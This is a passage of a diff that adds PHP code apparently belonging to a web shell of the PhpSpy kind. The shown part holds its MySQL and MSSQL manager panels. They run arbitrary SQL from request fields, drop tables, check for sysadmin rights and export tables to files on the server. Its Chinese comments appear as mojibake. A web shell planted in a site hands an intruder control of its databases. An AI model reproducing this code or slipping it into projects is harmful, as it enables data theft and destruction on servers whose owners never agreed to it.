+				$valstr .= $tmp."'".addslashes($val)."'";
+				$tmp = ',';
+			}
+		}
+		if ($keystr && $valstr) {
+			mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
+		}
+	}
+	if ($update && $insertsql && $base64) {
+		$valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			$valstr .= $tmp.$key."='".addslashes($val)."'";
+			$tmp = ',';
+		}
+		if ($valstr) {
+			$where = base64_decode($base64);
+			mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
+		}
+	}
+	if ($doing == 'del' && $base64) {
+		$where = base64_decode($base64);
+		$delete_sql = "DELETE FROM $tablename WHERE $where";
+		mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
+	}
+
+	if ($tablename && $doing == 'drop') {
+		mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		if (q("DROP TABLE $tablename")) {
+			m('Drop table of success');
+			$tablename = '';
+		} else {
+			m(mysql_error());
+		}
+	}
+
+	formhead(array('title'=>'MYSQL Manager'));
+	makehide('action','mysqladmin');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
+	makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+?>
+<script type="text/javascript">
+function editrecord(action, base64, tablename){
+	if (action == 'del') {		
+		if (!confirm('Is or isn\'t deletion record?')) return;
+	}
+	$('recordlist').doing.value=action;
+	$('recordlist').base64.value=base64;
+	$('recordlist').tablename.value=tablename;
+	$('recordlist').submit();
+}
+function moddbname(dbname) {
+	if(!dbname) return;
+	$('setdbname').dbname.value=dbname;
+	$('setdbname').submit();
+}
+function settable(tablename,doing,page) {
+	if(!tablename) return;
+	if (doing) {
+		$('settable').doing.value=doing;
+	}
+	if (page) {
+		$('settable').page.value=page;
+	}
+	$('settable').tablename.value=tablename;
+	$('settable').submit();
+}
+</script>
+<?php
+	//²Ù×÷¼Ç¼
+	formhead(array('name'=>'recordlist'));
+	makehide('doing');
+	makehide('action','mysqladmin');
+	makehide('base64');
+	makehide('tablename');
+	p($dbform);
+	formfoot();
+
+	//Ñ¡¶¨Êý¾Ý¿â
+	formhead(array('name'=>'setdbname'));
+	makehide('action','mysqladmin');
+	p($dbform);
+	if (!$dbname) {
+		makehide('dbname');
+	}
+	formfoot();
+
+	//Ñ¡¶¨±í
+	formhead(array('name'=>'settable'));
+	makehide('action','mysqladmin');
+	p($dbform);
+	makehide('tablename');
+	makehide('page',$page);
+	makehide('doing');
+	formfoot();
+
+	$cachetables = array();	
+	$pagenum = 30;
+	$page = intval($page);
+	if($page) {
+		$start_limit = ($page - 1) * $pagenum;
+	} else {
+		$start_limit = 0;
+		$page = 1;
+	}
+	if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
+		mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		//»ñÈ¡Êý¾Ý¿âÐÅÏ¢
+		$mysqlver = mysql_get_server_info();
+		p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
+		$highver = $mysqlver > '4.1' ? 1 : 0;
+
+		//»ñÈ¡Êý¾Ý¿â
+		$query = q("SHOW DATABASES");
+		$dbs = array();
+		$dbs[] = '-- Select a database --';
+		while($db = mysql_fetch_array($query)) {
+			$dbs[$db['Database']] = $db['Database'];
+		}
+		makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
+		$tabledb = array();
+		if ($dbname) {
+			p('<p>');
+			p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
+			if ($tablename) {
+				p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
+			}
+			p('</p>');
+			mysql_select_db($dbname);
+
+			$getnumsql = '';
+			$runquery = 0;
+			if ($sql_query) {
+				$runquery = 1;
+			}
+			$allowedit = 0;
+			if ($tablename && !$sql_query) {
+				$sql_query = "SELECT * FROM $tablename";
+				$getnumsql = $sql_query;
+				$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
+				$allowedit = 1;
+			}
+			p('<form action="'.$self.'" method="POST">');
+			p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
+			makehide('tablename', $tablename);
+			makehide('action','mysqladmin');
+			p($dbform);
+			p('</form>');
+			if ($tablename || ($runquery && $sql_query)) {
+				if ($doing == 'structure') {
+					$result = q("SHOW COLUMNS FROM $tablename");
+					$rowdb = array();
+					while($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					p('<tr class="head">');
+					p('<td>Field</td>');
+					p('<td>Type</td>');
+					p('<td>Null</td>');
+					p('<td>Key</td>');
+					p('<td>Default</td>');
+					p('<td>Extra</td>');
+					p('</tr>');
+					foreach ($rowdb as $row) {
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td>'.$row['Field'].'</td>');
+						p('<td>'.$row['Type'].'</td>');
+						p('<td>'.$row['Null'].'&nbsp;</td>');
+						p('<td>'.$row['Key'].'&nbsp;</td>');
+						p('<td>'.$row['Default'].'&nbsp;</td>');
+						p('<td>'.$row['Extra'].'&nbsp;</td>');
+						p('</tr>');
+					}
+					tbfoot();
+				} elseif ($doing == 'insert' || $doing == 'edit') {
+					$result = q('SHOW COLUMNS FROM '.$tablename);
+					while ($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					$rs = array();
+					if ($doing == 'insert') {
+						p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
+					} else {
+						p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
+						$where = base64_decode($base64);
+						$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
+						$rs = mysql_fetch_array($result);
+					}
+					p('<form method="post" action="'.$self.'">');
+					p($dbform);
+					makehide('action','mysqladmin');
+					makehide('tablename',$tablename);
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					foreach ($rowdb as $row) {
+						if ($rs[$row['Field']]) {
+							$value = htmlspecialchars($rs[$row['Field']]);
+						} else {
+							$value = '';
+						}
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') {
+							p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td>'.$value.'&nbsp;</td></tr>');
+						} else {							
+							p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
+						}
+					}
+					if ($doing == 'insert') {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
+					} else {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
+						makehide('base64', $base64);
+					}
+					p('</table></form>');
+				} else {
+					$querys = @explode(';',$sql_query);
+					foreach($querys as $num=>$query) {
+						if ($query) {
+							p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
+							switch(qy($query))
+							{
+								case 0:
+									p('<h2>Error : '.mysql_error().'</h2>');
+									break;	
+								case 1:
+									if (strtolower(substr($query,0,13)) == 'select * from') {
+										$allowedit = 1;
+									}
+									if ($getnumsql) {
+										$tatol = mysql_num_rows(q($getnumsql));
+										$multipage = multi($tatol, $pagenum, $page, $tablename);
+									}
+									if (!$tablename) {
+										$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
+										$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
+										preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
+										$tablename = $matches[1][0];
+									}
+
+									/*********************/
+									$getfield = q("SHOW COLUMNS FROM $tablename");
+									$rowdb = array();
+									$keyfied = ''; //Ö÷¼ü×Ö¶Î
+									while($row = @mysql_fetch_assoc($getfield)) {
+										$rowdb[$row['Field']]['Key'] = $row['Key'];
+										$rowdb[$row['Field']]['Extra'] = $row['Extra'];
+										if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') {
+											$keyfied = $row['Field'];
+										}
+									}
+									/*********************/								
+									//Ö±½Óä¯ÀÀ±í°´ÕÕÖ÷¼ü½µÐòÅÅÁÐ
+									if (strtolower(substr($query,0,13)) == 'select * from') {
+										$query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query);
+									}
+
+									$result = q($query);
+
+									p($multipage);
+									p('<table border="0" cellpadding="3" cellspacing="0">');
+									p('<tr class="head">');
+									if ($allowedit) p('<td>Action</td>');
+									$fieldnum = @mysql_num_fields($result);
+									for($i=0;$i<$fieldnum;$i++){
+										$name = @mysql_field_name($result, $i);
+										$type = @mysql_field_type($result, $i);
+										$len = @mysql_field_len($result, $i);
+										p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
+									}
+									p('</tr>');
+									
+									while($mn = @mysql_fetch_assoc($result)){
+										$thisbg = bg();
+										p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+										$where = $tmp = $b1 = '';
+										//Ñ¡È¡Ìõ¼þ×Ö¶ÎÓÃ
+										foreach($mn as $key=>$inside){
+											if ($inside) {
+												//²éÕÒÖ÷¼ü¡¢Î¨Ò»ÊôÐÔ¡¢×Ô¶¯Ôö¼ÓµÄ×ֶΣ¬ÕÒµ½¾ÍÍ£Ö¹£¬·ñÔò×éºÏËùÓÐ×Ö¶Î×÷ΪÌõ¼þ¡£
+												if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') {
+													$where = $key."='".addslashes($inside)."'";
+													break;
+												}
+												$where .= $tmp.$key."='".addslashes($inside)."'";
+												$tmp = ' AND ';
+											}
+										}
+										//¶ÁÈ¡¼Ç¼ÓÃ
+										foreach($mn as $key=>$inside){
+											$b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
+										}
+										$where = base64_encode($where);
+
+										if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
+
+										p($b1);
+										p('</tr>');
+										unset($b1);
+									}
+									tbfoot();
+									p($multipage);
+									break;
+								case 2:
+									$ar = mysql_affected_rows();
+									p('<h2>affected rows : <b>'.$ar.'</b></h2>');
+									break;
+							}
+						}
+					}
+				}
+			} else {
+				$query = q("SHOW TABLE STATUS");
+				$table_num = $table_rows = $data_size = 0;
+				$tabledb = array();
+				while($table = mysql_fetch_array($query)) {
+					$data_size = $data_size + $table['Data_length'];
+					$table_rows = $table_rows + $table['Rows'];
+					$table['Data_length'] = sizecount($table['Data_length']);
+					$table_num++;
+					$tabledb[] = $table;
+				}
+				$data_size = sizecount($data_size);
+				unset($table);
+				p('<table border="0" cellpadding="0" cellspacing="0">');
+				p('<form action="'.$self.'" method="POST">');
+				makehide('action','mysqladmin');
+				p($dbform);
+				p('<tr class="head">');
+				p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
+				p('<td>Name</td>');
+				p('<td>Rows</td>');
+				p('<td>Data_length</td>');
+				p('<td>Create_time</td>');
+				p('<td>Update_time</td>');
+				if ($highver) {
+					p('<td>Engine</td>');
+					p('<td>Collation</td>');
+				}
+				p('<td>Operate</td>');
+				p('</tr>');
+				foreach ($tabledb as $key => $table) {
+					$thisbg = bg();
+					p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+					p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
+					p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');
+					p('<td>'.$table['Rows'].'</td>');
+					p('<td>'.$table['Data_length'].'</td>');
+					p('<td>'.$table['Create_time'].'&nbsp;</td>');
+					p('<td>'.$table['Update_time'].'&nbsp;</td>');
+					if ($highver) {
+						p('<td>'.$table['Engine'].'</td>');
+						p('<td>'.$table['Collation'].'</td>');
+					}
+					p('<td><a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a></td>');
+					p('</tr>');
+				}
+				p('<tr class='.bg().'>');
+				p('<td>&nbsp;</td>');
+				p('<td>Total tables: '.$table_num.'</td>');
+				p('<td>'.$table_rows.'</td>');
+				p('<td>'.$data_size.'</td>');
+				p('<td colspan="'.($highver ? 5 : 3).'">&nbsp;</td>');
+				p('</tr>');
+
+				p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 9 : 7)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
+				makehide('doing','backupmysql');
+				formfoot();
+				p("</table>");
+				fr($query);
+			}
+		}
+	}
+	tbfoot();
+	@mysql_close();
+}//end mysql
+
+
+elseif ($action == 'mssqladmin') {
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'sa';
+	!$dbname && $dbname = 'master';
+	$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
+	if(isset($dbhost)){
+		$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
+	}
+	if(isset($dbuser)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
+	}
+	if(isset($dbpass)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
+	}
+	if(isset($dbname)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
+	}
+	if ($insert && $insertsql) {
+		$keystr = $valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			if ($val) {
+				$keystr .= $tmp.$key;
+				$valstr .= $tmp."'".addslashes($val)."'";
+				$tmp = ',';
+			}
+		}
+		if ($keystr && $valstr) {
+			msdbconn($dbhost,$dbuser,$dbpass,$dbname);
+			m(msq("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : msmsg());
+		}
+	}
+	if ($update && $insertsql && $base64) {
+		$valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			$valstr .= $tmp.$key."='".addslashes($val)."'";
+			$tmp = ',';
+		}
+		if ($valstr) {
+			$where = base64_decode($base64);
+			msdbconn($dbhost,$dbuser,$dbpass,$dbname);
+			m(msq("UPDATE $tablename SET $valstr WHERE $where") ? 'Record updating' : msmsg());
+		}
+	}
+	if ($doing == 'del' && $base64) {
+		$where = base64_decode($base64);
+		$delete_sql = "DELETE FROM $tablename WHERE $where";
+		msdbconn($dbhost,$dbuser,$dbpass,$dbname);
+		m(msq("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : msmsg());
+	}
+
+	if ($tablename && $doing == 'drop') {
+		msdbconn($dbhost,$dbuser,$dbpass,$dbname);
+		if (msq("DROP TABLE $tablename")) {
+			m('Drop table of success');
+			$tablename = '';
+		} else {
+			m(msmsg());
+		}
+	}
+
+	formhead(array('title'=>'MSSQL Manager'));
+	makehide('action','mssqladmin');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+?>
+<script type="text/javascript">
+function editrecord(action, base64, tablename){
+	if (action == 'del') {		
+		if (!confirm('Is or isn\'t deletion record?')) return;
+	}
+	$('recordlist').doing.value=action;
+	$('recordlist').base64.value=base64;
+	$('recordlist').tablename.value=tablename;
+	$('recordlist').submit();
+}
+function moddbname(dbname) {
+	if(!dbname) return;
+	$('setdbname').dbname.value=dbname;
+	$('setdbname').submit();
+}
+function settable(tablename,doing,page) {
+	if(!tablename) return;
+	if (doing) {
+		$('settable').doing.value=doing;
+	}
+	if (page) {
+		$('settable').page.value=page;
+	}
+	$('settable').tablename.value=tablename;
+	$('settable').submit();
+}
+function mssqlinfo(dbname) {
+	if(!dbname) return;
+	$('mssqlinfo').dbname.value=dbname;
+	$('mssqlinfo').submit();
+}
+</script>
+<?php
+	//²Ù×÷¼Ç¼
+	formhead(array('name'=>'recordlist'));
+	makehide('doing');
+	makehide('action','mssqladmin');
+	makehide('base64');
+	makehide('tablename');
+	p($dbform);
+	formfoot();
+
+	//Êý¾Ý¿âÐÅÏ¢
+	formhead(array('name'=>'mssqlinfo'));
+	makehide('action','mssqladmin');
+	makehide('doing','mssqlinfo');
+	makehide('dbname');
+	p($dbform);
+	formfoot();
+
+	//Ñ¡¶¨Êý¾Ý¿â
+	formhead(array('name'=>'setdbname'));
+	makehide('action','mssqladmin');
+	p($dbform);
+	if (!$dbname) {
+		makehide('dbname');
+	}
+	formfoot();
+
+	//Ñ¡¶¨±í
+	formhead(array('name'=>'settable'));
+	makehide('action','mssqladmin');
+	p($dbform);
+	makehide('tablename');
+	makehide('page',$page);
+	makehide('doing');
+	formfoot();
+
+	$cachetables = array();	
+	$pagenum = 30;
+	$page = intval($page);
+	if($page) {
+		$start_limit = ($page - 1) * $pagenum;
+	} else {
+		$start_limit = 0;
+		$page = 1;
+	}
+
+	if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
+		!$dbname && $dbname = 'master';
+		msdbconn($dbhost, $dbuser, $dbpass, $dbname);
+		////////////////////////////////////////////////////////////////
+		$query = msq('select @@version');
+		$msinfo = mssql_fetch_array($query);
+		echo '<p>'.$msinfo[0].'</p>';
+		
+		$query = msq("SELECT IS_SRVROLEMEMBER('sysadmin')");
+		$msinfo = mssql_fetch_array($query);
+		$issa = 0;
+		if ($msinfo[0]) {
+			$issa = 1;
+			echo '<h3>Your are sysadmin!</h3>';
+		}
+		//»ñÈ¡Êý¾Ý¿â
+		$query = msq("SELECT name FROM master.dbo.sysdatabases WHERE has_dbaccess(name) = 1 ORDER BY name");
+		$dbs = array();
+		$dbs[] = '-- Select a database --';
+		while($db = mssql_fetch_array($query)) {
+			$dbs[$db['name']] = $db['name'];
+		}
+		makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
+		$tabledb = array();
+		if ($dbname) {
+			p('<p>');
+			p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a> [ <a href="javascript:mssqlinfo(\''.$dbname.'\');">information</a> ]');
+			if ($tablename) {
+				p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
+			}
+			p('</p>');
+			if (!@mssql_select_db($dbname)) {
+				p('<h2>'.msmsg().'</h2>');
+				exit;
+			}
+			if ($doing == 'mssqlinfo') {
+				$result = msq("SELECT t1.owner, t1.crdate, t1.size, t2.DBBupDate, t3.DifBupDate, t4.JournalBupDate FROM (SELECT d.name, suser_sname(d.sid) AS owner, d.crdate, (SELECT STR(SUM(CONVERT(DEC(15), f.size)) * (SELECT v.low FROM master.dbo.spt_values v WHERE v.type = 'E' AND v.number = 1) / 1048576, 10, 2) + 'MB' FROM [$dbname].dbo.sysfiles f) AS size FROM master.dbo.sysdatabases d WHERE d.name = '$dbname') AS t1 LEFT JOIN (SELECT '$dbname' AS name, MAX(backup_finish_date) AS DBBupDate FROM msdb.dbo.backupset WHERE type = 'D' AND database_name = '$dbname') AS t2 ON t1.name = t2.name LEFT JOIN (SELECT '$dbname' AS name, MAX(backup_finish_date) AS DifBupDate FROM msdb.dbo.backupset WHERE type = 'I' AND database_name = '$dbname') AS t3 ON t1.name = t3.name LEFT JOIN (SELECT '$dbname' AS name, MAX(backup_finish_date) AS JournalBupDate FROM msdb.dbo.backupset WHERE type = 'L' AND database_name = '$dbname') AS t4 ON t1.name = t4.name");
+				$info = mssql_fetch_assoc($result);
+
+				p('<table border="0" cellpadding="3" cellspacing="0">');
+				p('<tr class="head">');
+				p('<td colspan="2">'.$dbname.' Information</td>');
+				p('</tr>');
+
+				p('<tr class="alt1" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt1\';">');
+				p('<td>Owner</td><td>'.$info['owner'].'</td>');
+				p('</tr>');
+				p('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';">');
+				p('<td>Create date</td><td>'.$info['crdate'].'</td>');
+				p('</tr>');
+				p('<tr class="alt1" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt1\';">');
+				p('<td>Size</td><td>'.$info['size'].'</td>');
+				p('</tr>');
+				p('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';">');
+				p('<td>Last backup</td><td>'.$info['DBBupDate'].'&nbsp;</td>');
+				p('</tr>');
+				p('<tr class="alt1" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt1\';">');
+				p('<td>Last differential backup</td><td>'.$info['DifBupDate'].'&nbsp;</td>');
+				p('</tr>');
+				p('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';">');
+				p('<td>Last log backup</td><td>'.$info['JournalBupDate'].'&nbsp;</td>');
+				p('</tr>');
+				tbfoot();
+				p('<br /><br />');
+				
+				$result = msq("EXEC sp_helpfile");
+				$rowdb = array();
+				while ($row = mssql_fetch_assoc($result)) {
+					$rowdb[] = $row;
+				}
+				foreach($rowdb as $row){
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					p('<tr class="head">');
+					p('<td colspan="2">'.$row['name'].'</td>');
+					p('</tr>');
+					p('<tr class="alt1" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt1\';">');
+					p('<td>Filename</td><td>'.$row['filename'].'&nbsp;</td>');
+					p('</tr>');
+					p('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';">');
+					p('<td>Filegroup</td><td>'.$row['filegroup'].'&nbsp;</td>');
+					p('</tr>');
+					p('<tr class="alt1" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt1\';">');
+					p('<td>Size</td><td>'.$row['size'].'&nbsp;</td>');
+					p('</tr>');
+					p('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';">');
+					p('<td>Maxsize</td><td>'.$row['maxsize'].'&nbsp;</td>');
+					p('</tr>');
+					p('<tr class="alt1" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt1\';">');
+					p('<td>Growth</td><td>'.$row['growth'].'&nbsp;</td>');
+					p('</tr>');
+					p('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';">');
+					p('<td>Usage</td><td>'.$row['usage'].'&nbsp;</td>');
+					p('</tr>');
+					tbfoot();
+					p('<br /><br />');
+				}
+			} else {
+				$getnumsql = '';
+				$runquery = 0;
+				if ($sql_query) {
+					$runquery = 1;
+				}
+				$allowedit = 0;
+				if ($tablename && !$sql_query) {
+					$sql_query = "SELECT * FROM $tablename";
+					$getnumsql = "SELECT count(*) FROM $tablename";
+					$allowedit = 1;
+				}
+
+				p('<form action="'.$self.'" method="POST">');
+				p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
+				makehide('tablename', $tablename);
+				makehide('action','mssqladmin');
+				p($dbform);
+				p('</form>');
+				if ($tablename || ($runquery && $sql_query)) {
+					if ($doing == 'structure') {
+						$result = msq("select b.name,c.name as type,c.xtype,b.length,b.isnullable,b.colstat,case when b.autoval is null then 0 else 1 end,b.colid,a.id,d.text from sysobjects a join syscolumns b on a.id = b.id join systypes c on b.xtype = c.xtype and c.usertype <> 18 left join syscomments d on d.id = b.cdefault where a.id = OBJECT_ID('$tablename') order by b.colid");
+						$rowdb = array();
+						while($row = mssql_fetch_array($result)) {
+							$rowdb[] = $row;
+						}
+						p('<table border="0" cellpadding="3" cellspacing="0">');
+						p('<tr class="head">');
+						p('<td>Field</td>');
+						p('<td>Type</td>');
+						p('<td>Length</td>');
+						p('<td>Isnullable</td>');
+						p('<td>Key</td>');
+						p('<td>Default</td>');
+						p('<td>Extra</td>');
+						p('</tr>');
+						foreach ($rowdb as $row) {
+							$thisbg = bg();
+							p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+							p('<td>'.$row['name'].'</td>');
+							p('<td>'.$row['type'].'['.$row['xtype'].']</td>');
+							p('<td>'.$row['length'].'&nbsp;</td>');
+							p('<td>'.($row['isnullable'] ? 'Yes' : 'No').'&nbsp;</td>');
+							p('<td>'.($row['colstat'] ? 'PRIMARY' : '').'&nbsp;</td>');
+							p('<td>'.$row['text'].'&nbsp;</td>');
+							p('<td>'.($row['autoval'] ? 'Auto_increment' : '').'&nbsp;</td>');
+							p('</tr>');
+						}
+						tbfoot();
+					} elseif ($doing == 'insert' || $doing == 'edit') {					
+						$result = msq("select b.name,c.name as type,c.xtype,b.length,b.isnullable,b.colstat,case when b.autoval is null then 0 else 1 end,b.colid,a.id,d.text from sysobjects a join syscolumns b on a.id = b.id join systypes c on b.xtype = c.xtype and c.usertype <> 18 left join syscomments d on d.id = b.cdefault where a.id = OBJECT_ID('$tablename') order by b.colid");
+						$rowdb = array();
+						while($tb = @mssql_fetch_assoc($result)) {
+							$rowdb[$tb['name']] = $tb;
+							$rowdb[$tb['name']]['Key'] = $tb['colstat'];
+							$rowdb[$tb['name']]['Auto'] = $tb['autoval'];
+						}
+						$rs = array();
+						if ($doing == 'insert') {
+							p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
+						} else {
+							p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
+							$where = base64_decode($base64);
+
+							$result = msq("SELECT top 1 * FROM $tablename WHERE $where");
+							$rs = mssql_fetch_array($result);
+						}
+						p('<form method="post" action="'.$self.'">');
+						p($dbform);
+						makehide('action','mssqladmin');
+						makehide('tablename',$tablename);
+						p('<table border="0" cellpadding="3" cellspacing="0">');
+
+						foreach ($rowdb as $row) {
+							if ($rs[$row['name']]) {
+								$value = htmlspecialchars($rs[$row['name']]);
+							} else {
+								$value = '';
+							}
+							$thisbg = bg();
+							p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+							if ($row['Key'] || $row['Auto']) {
+								p('<td><b>'.$row['name'].'</b><br />'.$row['type'].'('.$row['length'].')'.($row['colstat'] ? '<br /><b>PRIMARY</b>' : '').($row['autoval'] ? ' <br /><b>Auto</b>' : '').'</td><td>'.$value.'&nbsp;</td></tr>');
+							} else {							
